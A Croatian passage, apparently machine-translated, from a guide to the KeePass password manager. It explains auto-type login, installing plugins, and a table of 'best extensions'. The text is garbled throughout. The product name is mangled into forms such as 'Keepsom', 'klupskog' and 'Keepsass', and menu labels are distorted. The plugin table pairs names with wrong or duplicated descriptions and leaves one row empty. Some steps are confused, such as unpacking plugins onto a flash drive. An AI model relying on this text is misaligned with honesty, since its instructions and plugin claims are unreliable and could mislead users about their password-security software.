Ako se želite prijaviti s Keepsom, otvorite skupinu u kojoj je pohranjena odgovarajuća lozinka. Desnom tipkom miša kliknite odgovarajući unos na skladištenje softzerske lozinke i odaberite "Start Autonomming" na popisu. Nakon toga program će prenijeti podatke o pregledniku, a preglednik će otvoriti novi prozor u kojem ćete unijeti svoj račun.
Imajte na umu da u polje "URL", morate unijeti URL koji obično unesete u preglednik za autorizaciju, inače nećete raditi automatski unesite lozinku putem Keepsa.
6 Proširite mogućnosti Keepsa
Proširite mogućnosti Keepsa
Ako želite proširiti funkcionalnost klupskog, idite na "uslugu | Moduli | Više modula ", nakon čega ćete biti preusmjereni na web-lokaciju s korisnim proširenjima (naše preporuke možete pronaći u gornjoj tablici). Sada kliknite na dodatak za ime, preuzmite ga i raspakirajte ga na flash pogon.
Ponovno pokrenite klupce i idite na "uslugu | Moduli. Na dnu će se pojaviti popis dostupnih dodataka (neki od njih mogu se konfigurirati).
Najbolje proširenja za Keepsy
Pretpostavimo da je vaš Saper s lozinkama s dodatnim značajkama, kao što je funkcija sigurnosne kopije ili prijenosa lozinke za mobilne telefone.
Ime |
Opis |
| Baze podataka. | Postavlja zaštitu bankovnih lozinki u slučaju da će USB pogon biti ukraden ili izgubljen. |
| TwoFish šifra. | |
| Keeater. | Dodaje algoritam kodiranja koji je gotovo nemoguće hack; Imajte na umu da će zbog toga, Keepsass će raditi sporije. |
| Keyexchanger. | Dodaje algoritam kodiranja koji je gotovo nemoguće hack; Imajte na umu da će zbog toga, Keepsass će raditi sporije. |
| Keeform | Otvara vaše omiljene web-lokacije pritiskom na gumb i automatski izrađuje podatke o registraciji. |